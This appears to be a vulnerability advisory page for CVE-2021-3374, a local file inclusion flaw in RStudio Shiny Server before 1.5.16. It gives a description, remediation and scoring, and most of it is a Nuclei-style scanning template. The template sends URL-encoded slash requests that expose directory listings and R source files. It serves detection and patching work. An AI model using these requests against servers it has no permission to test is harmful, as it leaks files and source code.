CVE-2021-3374: Rstudio Shiny Server <1.5.16 - Local File Inclusion

2025-08-01 Rstudio Shiny Server PoC Public

Description

Rstudio Shiny Server prior to 1.5.16 is vulnerable to local file inclusion and source code leakage. This can be exploited by appending an encoded slash to the URL.

PoC

id: CVE-2021-3374

info:
  name: Rstudio Shiny Server <1.5.16 - Local File Inclusion
  author: geeknik
  severity: medium
  description: Rstudio Shiny Server prior to 1.5.16 is vulnerable to local file inclusion and source code leakage. This can be exploited by appending an encoded slash to the URL.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to read arbitrary files on the server, potentially exposing sensitive information.
  remediation: |
    Upgrade Rstudio Shiny Server to version 1.5.16 or later to mitigate the vulnerability.
  reference:
    - https://github.com/colemanjp/shinyserver-directory-traversal-source-code-leak
    - https://blog.rstudio.com/2021/01/13/shiny-server-1-5-16-update/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-3374
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2021-3374
    cwe-id: CWE-22
    epss-score: 0.14424
    epss-percentile: 0.9644
    cpe: cpe:2.3:a:rstudio:shiny_server:*:*:*:*:pro:*:*:*
  metadata:
    max-request: 2
    vendor: rstudio
    product: shiny_server
  tags: cve2021,cve,rstudio,traversal,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/%2f/"
      - "{{BaseURL}}/sample-apps/hello/%2f/"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "Index of /"

      - type: regex
        part: body
        regex:
          - "[A-Za-z].*\\.R"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502201ae090f976cf7bb42f0e8b6044a3cfe7eeafff25ea72f35a7caa5fd957088997022100bee75f493aab94fdf4157f17bf4bf6497210e770fcd142421c12d44fc6d6aaaf:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities